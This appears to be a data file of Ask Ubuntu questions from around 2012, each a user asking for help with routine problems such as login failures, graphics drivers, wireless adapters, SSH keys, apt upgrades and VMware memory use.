221464	password does not work for everything `` anymore '' !	i did set my password as i installed ubuntu some months ago , and all is running flawless up to few days ago . since then , although i did never change my password , the whole authentication is not working properly anymore : i can log in at start , but i ca n't install updates anymore ( i type the password , and i get back the answer `` authentication attempt was unsuccessful '' ) and i ca n't change my password anymore ( same answer as above when i try to unlock the user-account ) when i 'm afk for more than 10 minutes , come back and the pc is locked , i can not log in anymore ( same as above , i guess , i did not write it down , but he does not get my password anymore ) i read a bit here and there searching for similar problems , and although i kind of believe now that ubuntu might have more than one password ( right ? ) , i still can not understand why the same password which used to work for everything up to one week ago , is now `` half '' useless ... thankful for any help to set everything alright again ( and to understand whats going on as well ) , kind regards , max
221465	web cam stopped working after reinstalling ubuntu	my lenovo thinkpad 's integrated webcam used to work just fine with 12.04 . recently i updated to 12.10 but had problems with virtualbox crashing and had to wipe everything and reinstall 12.04 . this was a hassle but so be it . my understanding is that for all intents and purposes i should now have pretty much a relatively fresh ubuntu install and for the most part it works . except for my webcam . the system detects the web cam as present - both virtualbox and skype list it . however no application can actually do anything with it it . cheese simply says `` no device found '' . the troubleshooting wiki does n't offer much help . how do i troubleshoot ?
221466	timely automatic unexpected reboot on ubuntu desktop	we have a remote linux server ( ubuntu 10.04 desktop ) . the system log indicates the system has been restarted on the timely fashion . here is a part of the last output : ut pts/0 192.169.50.2-sta sat nov 24 22:17 still logged in reboot system boot 2.6.32-21-generi sat nov 24 22:04 - 22:17 ( 00:13 ) ut pts/0 server.local sat nov 24 21:36 - crash ( 00:27 ) reboot system boot 2.6.32-21-generi sat nov 24 15:55 - 22:17 ( 06:21 ) reboot system boot 2.6.32-21-generi fri nov 23 18:02 - 22:17 ( 1+04:14 ) reboot system boot 2.6.32-21-generi fri nov 23 10:39 - 22:17 ( 1+11:38 ) reboot system boot 2.6.32-21-generi fri nov 23 04:18 - 22:17 ( 1+17:59 ) reboot system boot 2.6.32-21-generi fri nov 23 03:57 - 22:17 ( 1+18:20 ) reboot system boot 2.6.32-21-generi thu nov 22 20:38 - 22:17 ( 2+01:38 ) reboot system boot 2.6.32-21-generi thu nov 22 11:13 - 22:17 ( 2+11:03 ) reboot system boot 2.6.32-21-generi thu nov 22 08:12 - 22:17 ( 2+14:05 ) reboot system boot 2.6.32-21-generi wed nov 21 11:16 - 22:17 ( 3+11:00 ) reboot system boot 2.6.32-21-generi tue nov 20 22:36 - 22:17 ( 3+23:41 ) reboot system boot 2.6.32-21-generi tue nov 20 14:12 - 22:17 ( 4+08:05 ) reboot system boot 2.6.32-21-generi tue nov 20 11:32 - 22:17 ( 4+10:44 ) reboot system boot 2.6.32-21-generi tue nov 20 01:52 - 22:17 ( 4+20:25 ) reboot system boot 2.6.32-21-generi tue nov 20 00:22 - 22:17 ( 4+21:55 ) reboot system boot 2.6.32-21-generi mon nov 19 17:27 - 22:17 ( 5+04:50 ) it looks the system is set to be restarted at 22:17 . can anyone guide me why this happens ? thanks in advance .
221467	low resolution and tiny font bug with my xorg.conf	i 'm having a very strange issues with my graphics in kubuntu 12.04 . i 'm almost certain a package has been downloaded which is disabling my default nvidia drivers and rendering my desktop using a very old or incompatible driver . this is the end result i 'm seeing so these are the steps i went through to get where i am and i have no idea how to proceed . 1 . so the first step i thought was to reinstall my nvidia drivers from xswat 's ppa in the hopes that it would override these changes . sadly this did n't work . ran 'nvidia-settings ' where i am given a warning that the nvidia driver is not being used . success ! we now know what the problem is . nvidia recommends to run 'nvidia-xconfig ' and restart the xserver . sounds simple enough . i run nvidia-xconfig ( which seems to jsut rewrite my xorg.conf file ) . and i kill kdm entirely . i restart x with the startx command and were right back to step 2 with nvidia-settings complaining that the nvidia driver is not being used . note : is killing kdm overkill for shutting down xserver ? i check out my xorg.conf file and everything seems in order . nvidia-xconfig : version 304.64 ( buildmeister @ swio-display-x86-rhel47-12 ) tue oct 30 12:04:46 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
221469	how do i list all the relation variables and debug them interactively ?	i 'm writing a charm that requires a mysql database , i found from looking at other charms that this ( below ) is how i get the info about the database : user=`relation-get user` password=`relation-get password` mysqlhost=`relation-get private-address` but i just found that from reading the wordpress charm example , is there a way to show all the relation variables that i can use ? also , while debugging my db-relation-changed script , i wanted to ssh into my host and interactively run those commands , for example relation-get user , but it did n't work . i resorted to having to restart everything and use juju log to print them out . this wasted a lot of time . is there a way to print out these relations , either from my dev box or from the instance running my charm ? ( below is what happens when i tried to interactively run relation-get ) : ubuntu @ mfisch-local-tracks-0 : ~ $ relation-get user usage : relation-get [ -h ] [ -o output ] [ -s socket ] [ -- client-id client_id ] [ -- format format ] [ -- log-file file ] [ -- log-level critical|debug|info|error|warning ] [ -r relation id ] [ settings_name ] [ unit_name ] no juju_agent_socket/-s option found i tried juju debug-hooks tracks/0 -e local , that dropped me into a shell and relation-get still failed .
221474	library missing for executable file	there 's an executable i downloaded onto my ubuntu 10.04 and i ca n't run because it 's missing a library . i have also tried compiling the source with cmake . this is my terminal output : zack @ zack-laptop : ~/desktop $ ./multimc ./multimc : error while loading shared libraries : libssl.so.1.0.0 : can not open shared object file : no such file or directory i think i need libssl 1.0 to run this file , but i 'm not sure . any help ? @ jim salter : the output of lsb_release -d ; apt-file update ; apt-file search libssl.so.1.0.0 is : description : ubuntu 10.04.4 lts apt-file is now using the user 's cache directory . if you want to switch back to the system-wide cache directory , run 'apt-file purge' downloading complete file http : //us.archive.ubuntu.com/ubuntu/dists/lucid/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 100 16.8m 100 16.8m 0 0 275k 0 0:01:02 0:01:02 -- : -- : -- 171k downloading complete file http : //us.archive.ubuntu.com/ubuntu/dists/lucid-updates/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 100 15.4m 100 15.4m 0 0 228k 0 0:01:09 0:01:09 -- : -- : -- 346k downloading index http : //us.archive.ubuntu.com/ubuntu/dists/lucid/contents-i386.diff/index : no index available . downloading complete file http : //us.archive.ubuntu.com/ubuntu/dists/lucid/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0 file is up-to-date . downloading index http : //us.archive.ubuntu.com/ubuntu/dists/lucid-updates/contents-i386.diff/index : no index available . downloading complete file http : //us.archive.ubuntu.com/ubuntu/dists/lucid-updates/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 0 15.4m 0 0 0 0 0 0 -- : -- : -- 0:00:03 -- : -- : -- 0 file is up-to-date . downloading index http : //us.archive.ubuntu.com/ubuntu/dists/lucid/contents-i386.diff/index : no index available . downloading complete file http : //us.archive.ubuntu.com/ubuntu/dists/lucid/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0 file is up-to-date . downloading index http : //us.archive.ubuntu.com/ubuntu/dists/lucid-updates/contents-i386.diff/index : no index available . downloading complete file http : //us.archive.ubuntu.com/ubuntu/dists/lucid-updates/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- 0:00:01 -- : -- : -- 0 file is up-to-date . ignoring source without contents file : http : //archive.canonical.com/ubuntu/dists/lucid/contents-i386.gz downloading complete file http : //security.ubuntu.com/ubuntu/dists/lucid-security/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 100 12.2m 100 12.2m 0 0 303k 0 0:00:41 0:00:41 -- : -- : -- 367k downloading index http : //security.ubuntu.com/ubuntu/dists/lucid-security/contents-i386.diff/index : no index available . downloading complete file http : //security.ubuntu.com/ubuntu/dists/lucid-security/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 0 12.2m 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0 file is up-to-date . downloading index http : //security.ubuntu.com/ubuntu/dists/lucid-security/contents-i386.diff/index : no index available . downloading complete file http : //security.ubuntu.com/ubuntu/dists/lucid-security/contents-i386.gz % total % received % xferd average speed time time time current dload upload total spent left speed 0 12.2m 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0 file is up-to-date . ignoring source without contents file : http : //dl.google.com/linux/chrome/deb/dists/stable/contents-i386.gz ignoring source without contents file : http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu/dists/lucid/contents-i386.gz
221477	smart data self-test failed	when i run the smart data self-test disk utility the result indicates smart self test failed . yet when i look at the individual test , they all say ok. did the test itself fail or did the disk fail the test ? running version 12.10 ... ..
221482	ca n't enable wireless on boot	i just installed ubuntu ( wubi ) , and i 'm having problems with my wireless . when i 'm on windows , i have perfect wireless connection , and the wireless button on my computer is blue . but with ubuntu , i do n't have a connection , and the button is orange . i tried looking in the bios ( version f.24 ) , but i failed to find anything related to wireless connections . i 've tried doing some solutions from other people online , but with no success . thanks for reading , brackson
221484	quickly network commands in python	i am working on a program that mounts a windows shared network drive using quickly . so i sat up my gui and everything.. but i do n't know any python commands that mount a network place.. usually when i use the linux script i use this command gvfs-mount smb : //192.168.2.25/ '' extended ( d ) '' but of course this wo n't work with python.. so can anyone help me or give me the command to try to mount a specific network place ?
221487	unity 2d for 12.10	i 'm using 12.10 with unity 3d on my laptop and it 's really laggy compared to when i used 12.04 with unity 2d how can i install unity 2d for 12.10 ?
221490	heroes 3 using wine ?	no matter how much i read i just ca n't understand how to get wine to work . i 'm trying to play heroes 3 . i currently have wine 1.5.18 installed on ubuntu 12.10 64-bit , and i have a rar file with the files from an installed copy of the heroes 3 game in it ( not the installer ) . this copy of the already-installed game has worked on every computer i tried after extracting , but i have no idea what to do with it on linux .
221491	help understanding the migrate wubi documentation ?	i 'm looking at the migratewubi page but i 'm not sure if i need to change the partition directories to the ones i created , and if so , i 'm not too sure which ones i need to change . here are the partitions i 've made : should i just copy and paste : sudo bash wubi-move.sh /dev/sda5 /dev/sda6 into my terminal or something else ? also , do i enter just this one line or do i need to enter any other commands in there ? thanks !
221493	run ubuntu 12.04 without hard drive	is there any possible way i can run ubuntu 12.04 from a live usb drive with out having a hard drive in my computer ? the hard drive in my netbook is dead so i decided to make a live usb drive to run it from . when booting the operating system it gets to the stage with the purple screen where it says 'ubuntu ' and the orange dots move across . this is where it is searching for the hard drive , but because there is n't one it wo n't proceed with the installation . this is a netbook remember , and so i ca n't use an ubuntu boot disc as there is no cd drive either . hope you lot will be able to help as i am really stuck with this . thanks everyone !
221496	which is the the best fingeprint-reader program available ?	being new to ubuntu and curious , i installed fingerprint gui from the web some days back , but it turned out to be a mess with too many password puzzles . e.g. , when i switch on my laptop , the default login screen would ask for password , but at the same time the fingerprint reading window would also pop up from nowhere , making it difficult to enter the login password at the same time fingerprint detecting program would declare that because no finger was scanned 'authentication failed ' . later i had to re-install ubuntu itself to start thing new . i found finger print gui to be a shabby one to be re installed . so is there any other finger scanning program for ubuntu 12.10 ?
221497	what am i doing wrong with racoon on ubuntu precise ?	i have a working racoon ipsec vpn setup on an ubuntu lucid server . to set it up , i just did an apt-get on the ipsectools package and configured the racoon.conf file . if i take the exact same steps , but also install the racoon package in precise ( it 's separated from ipsec-tools in precise ) and use an identical config , the racoon daemon wo n't even start . if you set logging in racoon to debug , you see the following in the syslog : nov 21 00:42:02 vpnhub2 racoon : debug : getsainfo params : loc='anonymous ' rmt='anonymous ' peer='null ' client='null ' id=1 nov 21 00:42:02 vpnhub2 racoon : info : resize address pool from 0 to 100 nov 21 00:42:02 vpnhub2 racoon : debug : open /var/run/racoon/racoon.sock as racoon management . nov 21 00:42:02 vpnhub2 racoon : info : x.x.x.x [ 4500 ] used for nat-t nov 21 00:42:02 vpnhub2 racoon : info : x.x.x.x [ 4500 ] used as isakmp port ( fd=6 ) nov 21 00:42:02 vpnhub2 racoon : info : x.x.x.x [ 500 ] used for nat-t nov 21 00:42:02 vpnhub2 racoon : info : x.x.x.x [ 500 ] used as isakmp port ( fd=7 ) nov 21 00:42:02 vpnhub2 racoon : debug : pk_recv : retry [ 0 ] recv ( ) nov 21 00:42:02 vpnhub2 racoon : debug : got pfkey x_spddump message nov 21 00:42:02 vpnhub2 racoon : debug : pfkey x_spddump failed : no such file or directory racoon crashes shortly after you start it . it does this whether i use my config or the default one installed with the package . i have tried this on a rackspace cloud server and a vm on virtualbox , using the 32bit and 64bit versions - same result . am i doing something wrong , or is the current version of racoon not working ?
221498	how do i get the preferences option in totem 3.6 on ubuntu 12.10 ?	i have upgraded my ubuntu 12.10 with the gnome 3 ppa ( ppa : gnome3-team/gnome3 ) . this has updated totem to version 3.6.2 . since gnome 3.6 has introduced its own global menus , i can not find the preferences option in totem 's menu now . i am using the default unity global menu system . any ideas on how to get preferences back ?
221499	10gb installed but only 7.8 is shown	i installed 10gb but my 12.04 lts 64-bit shows only 10gb . but the swap shows 10gb so i think internally it did find 10gb ? i do n't remember exactly how ubunt calculate how much swap needs by default , per memory installed . i would understand if only 9gb is revealed to user , but 7.8 ? idea ? total used free shared buffers cached mem : 7975 927 7048 0 38 352 -/+ buffers/cache : 536 7438 swap : 10228 0 10228
221500	how can i uninstall linux ubuntu ?	is there a way i can uninstall ubuntu ? my computer already has windows so if i uninstall ubuntu it starts as windows instead of ubuntu but i donât know how to uninstall it .
221502	how to move my downloaded wallpapers to the default wallpaper directory	, i used a newbie tutorial to download several wallpapers . the tutorial suggested that i create a 'wallpapers ' folder on my desktop to store them . that worked fine , but now i want to move those files to the usr/share/backgrounds so they will show up in my default wallpaper list . i 've tried cp & mv in terminal , but neither works , and i get an error message the `` usr/share/backgrounds '' does n't exist , though i can access it in terminal . could this be a permission problem , or is there an easier way to do this ?
221509	quickly stop all network services except sshd ( or boot with only sshd running )	i have an ubuntu server 12.04 box acting as a home file server . at times i would like to be able to brings down all my normal network services ( nfs-kernel-server and friends , netatalk , nmbd , smbd , backuppc , subsonic , and transmission-daemon ) without bringing down sshd . i would also like to be able to boot the machine without starting all of these services but with sshd running . before upstart , this would have been simple . set the default runlevel to 3 . set the above-mentioned network services to start at runlevels 3-5 , but not 2 . leave sshd starting at 2-5 . then , to bring down everything except sshd , run telinit 2 . or to boot without starting all those services , append 3 to the kernel command line . however , some of these services ( idmapd , statd , rpcbind , nmbd , and smbd ) have been converted to upstart jobs . as a test , i tried adding and runlevel [ 345 ] to the start condition of smbd and nmbd , but it did n't seem to do anything : start on ( local-filesystems and net-device-up and runlevel [ 345 ] ) stop on runlevel [ ! 345 ] what am i missing ? how can i get these upstart jobs to respond to runlevel changes ?
221510	bluetooth mouse not connecting to laptop ?	i have a microsoft wireless notebook presenter mouse 8000 that has bluetooth connectivity . i have tried to connect it directly to the computer 's bluetooth without using the dongole , but it does not see the mouse . it connects to my mac perfectly fine . thanks ! additional info : in the system settings on start up , bluetooth is enabled .
221511	packhard bell dot s netbook ubuntu 12.10	sorry im absolutly linux beginner ... . i bought a packhard bell netbook dots with limpus.did not get along with limpus so wanted to install ubuntu . netbook : 2 gb ram intel atom n2600 , intel graphics media accelerator 3600 i over installled ubuntu 12.10 ( desktop version ) like in the instruction ( isofile over usb ) . installation went fine . no problems . when starting after installation alot of text is coming ... ..starting xyz ... .with alot of okays at the end of line but nothing happends : ends with # starting cpu interrups balancing daemon , stopping anachronics cron and blinking cursor ... was reading in this forum , tried to do some things like # recoverymode # and nomodeset ... but did not work or where do i get this graphic drivers from . packard bell just offers windows drivers.and how do i install them ? maybe its a completely diffrent cause for this ? thanks alot
221516	download file directly to a remote machine	is there any possibility to download a file to some remote machine which has ftp , ssh , nfs access . what i mean is that it does n't have to go through the machine from which the download is issued .
221517	can not connect wireless internet with an atheros ar9285 802.11b/g/n wi-fi adapter	i am new to ubuntu , am trying to connect to wireless network but in the network center i can not even select a local network there are no listings , in windows its straight forward enter in a key , however , i can not seem to get the wireless to respond . any ideas ?
221522	meaning of `` processing triggers for ureadahead ''	i am trying to uninstall tomcat 7 from ubuntu 12.04 by issuing the command sudo apt-get remove tomcat7 as a result i am getting the following response my questions has the package tomcat7 been removed ? if yes , why do n't the message stating so has not been printed and if no why it has not been removed ? what is the meaning of `` processing triggers from ureachahead ... '' ?
221528	running scripts from another directory	quite often , the script i want to execute is not located in my current working directory and i do n't really want to leave it . is it a good practice to run scripts ( bash , perl etc . ) from another directory ? will they usually find all the stuff they need to run properly ? if so , what is the best way to run a `` distant '' script ? is it . /path/to/script or sh /path/to/script and how to use sudo in such cases ? this , for example , does n't work : sudo . /path/to/script
221529	delete /var/cache/* how can i fix it ?	i accidentally removes all files in /var/cache/ directory with sudo rm -rf command . now i can not see the files in trash to bring them back . i would like to know how bad is the situation if these files are removed ? is ubuntu going to work normally and recreate the directories in cache again automatically ? if not , which directories do i have to create in /var/cache/ manually to let everything work fine ? i have already manually made apt and apache2 and debconf in cache directoy but i do not know if i miss more important directory which needed to be created there . i hope somebody can guide me to fix this issue .
221531	can i use a 3d mouse with ubuntu ?	can i use a 3d mouse with ubuntu ? i have a 3dconnexion spacenavigator , their website includes drivers for suse and redhat , but i 'd rather not install another distro if i can help it . i 'm hoping to learn blender with it and wondered if anyone has managed this with ubuntu .
221536	ubuntu 12.04 nvidia breaks resolution	i am running ubuntu 12.04 64-bit and i have a nvidia geforce gt 650m , it was running fine with 1920 x 1024 , except a lot of tearing everytime i ran videos . i thought activating the nvidia driver maybe would fix this . when entering `` nvidia x server setting '' it says `` you do not appear to be using nvidia x driver . please edit your x configuration file ( just run `` nvidia-xconfig '' as root ) , and restart the x server . i did and then the computer reboots with a resolutioin of 640 x 480 . how can i restore the previous settings , or preferably get it to show full resolution without tearing ? when i enter `` nvidia x server settings '' now it still says the same as above , `` do not appear to be using nvidia x driver '' when i go to `` system settings , additional drivers '' it says nvidia_current -- > `` this driver is activated but not currently in use '' astr0 edit : output of xorg.conf # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.48 ( buildmeister @ swio-display-x86-rhel47-05.nvidia.com ) sun sep 9 21:29:02 pdt 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection
221543	ubuntu 12.04 mac change not able to connect - broadcom bcm4313	okay guys , so i 've looked around extensively on this topic , only to find that no one has a true solution , only half explained work arounds . something tells me this problem can be solved , for the pure reason that i `` can `` change my wifi-cards mac address in windows 7 both manually and using iron geeks madmacs . so this leads me to investigate , why after changing my mac on ubuntu 10.04/10.10/12.04/backtrack 5 r2/r3 why i can not connect . please note that this is not a problem of my router , i have tried it on multiple public access points , and with my changed mac , i can not even connect to an open network . i 've read somewhere that you have to change the mac before the wifi-card 's true mac is released in bios . is this true ? this is the only logical explanation i can think of right now . i do n't mind going out and buying a new wifi-card that does support ubuntu mac cloning . if any one has one working out of the box please let me know . description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : c0:18:85:43 : c6 : e4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.2.0-29-generic-pae firmware=n/a ip=10.1.1.8 latency=0 link=yes multicast=yes wireless=ieee 8 ' i have tried both network-manager & wicd both failing . i use acer aspire d-270 , first off i could n't even change my mac address , got the error of device busy etc . but then i added the macchange to startup now the mac changes but it just wont connect till i set it back to original mac .
221545	ssh always prompts for key password	i 'm using 12.10 with gnome-shell 3.6 . i have multiple ssh keypairs ( created with ssh-keygen ) . they 're stored in ~/.ssh/ids/hostname/id_rsa and id_rsa.pub . i have a file ~/.ssh/config which says which key to use with which host . whenever i connect to one of the hosts , it always prompts me for the id_rsa password . i want the keys to be unlocked whenever i 'm logged in . i tried to import the keys into seahorse ( aka passwords and keys ) , but i ran against this bug https : //bugs.launchpad.net/ubuntu/+source/seahorse/+bug/1017210 i then tried to use ssh-add . this gave me the proper behavior , but it did n't persist across sessions/reboots . before i created different keys for different hosts , gnome-shell would give me a popup asking for my login password , and after i entered it , the keys would be unlocked for the rest of the session . how can i get this to work again ?
221547	i got troubles installing xubuntu in my netbook dell	i have troubles installing the xubuntu 12.10 version . i 'm trying to install it from a usb containing an iso image of xubuntu because my netbook does not have a cd/dvd burner , i 've also used yumi to create a booteable usb , but it does n't work properly , the message the screen shows is the next : busybox v1.19.3 ( ubuntu 1:1.19.3-7ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) unable to find a medium containing a live file system i wonder if you guys would mind helping me to solve this problem . i get stuck on this step , and it happens the same when i try to install ubuntu 8.10 i need your help guys , i am beginner in these topics about ubuntu and other distros .
221553	apt-get update successful , but apt-get upgrade failure to connect	i keep reading the many similar problems , but the solutions and recommendations are not successful for me . i thought maybe it was a network problem , but no port is blocked . i finally took of all firewall and still a problem . i have changed sources from us servers , main server , and even let update manage look for a best server . still have problem . here is what i get : thyme @ thyme-inspiron-1545 : ~ $ sudo apt-get update [ sudo ] password for thyme : ign ttp : //security.ubuntu.com precise-security inrelease ign ttp : //archive.ubuntu.com precise inrelease hit ttp : //security.ubuntu.com precise-security release.gpg hit ttp : //archive.ubuntu.com precise release.gpg hit ttp : //security.ubuntu.com precise-security release hit ttp : //archive.ubuntu.com precise release hit ttp : //security.ubuntu.com precise-security/universe i386 packages hit ttp : //archive.ubuntu.com precise/main i386 packages hit ttp : //security.ubuntu.com precise-security/main i386 packages hit ttp : //security.ubuntu.com precise-security/main translationindex hit ttp : //security.ubuntu.com precise-security/universe translationindex hit ttp : //security.ubuntu.com precise-security/main translation-en hit tp : //security.ubuntu.com precise-security/universe translation-en hit ttp : //archive.ubuntu.com precise/universe i386 packages hit ttp : //archive.ubuntu.com precise/main translationindex hit ttp : //archive.ubuntu.com precise/universe translationindex hit ttp : //archive.ubuntu.com precise/main translation-en hit ttp : //archive.ubuntu.com precise/universe translation-en reading package lists ... done thyme @ thyme-inspiron-1545 : ~ $ thyme @ thyme-inspiron-1545 : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-generic-pae linux-headers-generic-pae linux-image-generic-pae the following packages will be upgraded : accountsservice apparmor apt apt-transport-https apt-utils bind9-host dbus dbus-x11 dnsutils firefox firefox-globalmenu firefox-gnome-support firefox-locale-en fonts-opensymbol gir1.2-javascriptcoregtk-3.0 gir1.2-rb-3.0 gir1.2-webkit-3.0 gnupg gpgv isc-dhcp-client isc-dhcp-common krb5-locales libaccountsservice0 libapt-inst1.4 libapt-pkg4.12 libbind9-80 libc-bin libc-dev-bin libc6 libc6-dev libdbus-1-3 libdns81 libexif12 libexpat1 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglu1-mesa libgssapi-krb5-2 libisc83 libisccc80 libisccfg82 libjavascriptcoregtk-3.0-0 libk5crypto3 libkrb5-3 libkrb5support0 liblwres80 libnss3 libproxy1 libproxy1-plugin-gsettings libproxy1-plugin-networkmanager libpurple-bin libpurple0 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libreoffice-base-core libreoffice-calc libreoffice-common libreoffice-core libreoffice-draw libreoffice-emailmerge libreoffice-gnome libreoffice-gtk libreoffice-help-en-us libreoffice-impress libreoffice-math libreoffice-style-human libreoffice-style-tango libreoffice-writer librhythmbox-core5 libsmbclient libsnmp-base libsnmp15 libssl1.0.0 libsyncdaemon-1.0-1 libtasn1-3 libtiff4 libunity-2d-private0 libwbclient0 libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxatracker1 libxml2 libxslt1.1 linux-libc-dev multiarch-support openssl python-crypto python-keyring python-libproxy python-libxml2 python-software-properties python-ubuntuone-client python-ubuntuone-storageprotocol python-uno qdbus rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins samba-common samba-common-bin smbclient software-properties-common software-properties-gtk sudo thunderbird thunderbird-globalmenu thunderbird-gnome-support transmission-common transmission-gtk tzdata ubuntuone-client unity-2d unity-2d-common unity-2d-panel unity-2d-shell unity-2d-spread uno-libs3 update-manager update-manager-core ure xdiagnose xserver-common xserver-xorg-core xul-ext-ubufox 139 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . need to get 203 mb/219 mb of archives . after this operation , 15.8 mb of additional disk space will be used . do you want to continue [ y/n ] ? had to take rest off because hassle to go in and disable links since as new user i am only allowed two links . hard to give results with that restriction ! essentially was continual similar response of : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/t/transmission/transmission-common_2.51-0ubuntu1.1_all.deb unable to connect to security.ubuntu.com : http : [ ip : 91.189.92.184 80 ] please provide some guidance . i have been using ubuntu since 2007 and never had a problem upgrading or installing new releases . this has been three days working on this . thanks in advance ...
221554	ubuntu 12.10 and vmware workstation 9 : ram caching causes severe performance drops	i have read plenty of threads on memory caching and the standard response of `` large cache is good , it should n't effect performance '' , `` the kernel knows best '' . i have recently upgraded from 12.04 to 12.10 and changed from virtualbox to vmware workstation and the performance differences are severe ( i suspect it is because of the latter ) . when i am running my virtual machine the system load monitor graph shows less than 50 % memory usage generally . system load indicator is showing me that the rest of my ram is used in the cache all the time . plain and simple this is the comparison : before cache was very sparingly used , pretty much none of my memory usage was the cache swappiness was 0 ( caused my memory to be used first , then swap only if needed ) performance was quite good and logical ram was used fully first , caching was minimal . i could run enough software to utilize my full 4gb of ram without any performance degradation whatsoever swap space was then used as needed which was obviously slower ( i am on a hdd ) but was still usable when the current program was loaded into memory after cache is used to fill the full 4gb as soon as my virtual machine is run swappiness is 0 ( same behaviour as before but cache uses full memory straight away ) performance is terrible and unusable while running ubuntu software basic things like changing windows takes 2 minutes + changing screens happens frame by frame over sometimes up to 5 minutes can not run an ide and vm like i could with ease before so basically , any suggestions on how to take my performance back to how it was before while keeping my current setup ? my suspicion is vmware is the problem , but how do i see what is tied to the use of the cache ? surely there is a way to control this behaviour in software as polished as vmware ? thanks edit : could also be important to note that the behaviour differs depending on whether vmware is open or closed . if vmware is open , then the ram will lock at like 50 % and 50 % cache and go into the complete lock up mentioned above . contrastingly , if vmware is closed ( after being open ) , then the ram will continue to rise as it needs / cache will stay as the complete remaining memory and there is no noticeable performance degradation . edit2 : i have swapped my swappiness to 5 as suggested , no change whatsoever ( also had the same problems with swappiness of 10 and 60 prior to posting this question ) . on closer examination , there is something really messed up . system monitor ( and confirmed with the terminal commands suggested - free -m namely ) are showing the following : ben @ ben-hpdv6 : ~ $ free -m total used free shared buffers cached mem : 3945 3827 117 0 42 2770 -/+ buffers/cache : 1014 2931 swap : 1905 0 1905 which says that only ~ 1gb of my ram is being used and ~3gb is in disk cache but my vm is running and is allocated 1.5gb of ram . there was no increase in my used ram when i loaded the vm , but the cache jumped . system monitor ( was confirmed with ps -aux ) does show that vmware has a correct sounding 1.8gb of ram but obviously free -m is showing otherwise . the results also suggest otherwise as my system struggled to even open this chrome page to post the reply ( i only have vmware workstation and terminal open ) . its like the memory is n't being declared correctly as ram memory usage ( as opposed to cache ) and then the kernel obviously is n't responding properly based on that ? like its trying to release the cache memory as required like its supposed to but it ca n't because its in fact used memory / not cache . i am just spitballing here now , really looking for some help about how to get to the bottom of this . any idea whatsoever on finding out what is going on ? is there a way to confirm this is a vmware problem and not a ubuntu one ?
